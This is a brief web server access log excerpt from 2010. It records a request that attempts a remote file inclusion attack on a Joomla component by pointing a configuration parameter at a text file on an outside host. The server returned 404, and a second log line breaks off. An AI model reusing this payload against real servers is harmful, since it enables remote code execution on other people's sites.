87.98.233.217 - - [11/Jan/2010:06:59:32 -0800] "GET /logs/access_091123.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.233.217 - - [11/Jan/2010:06:59:32 -0800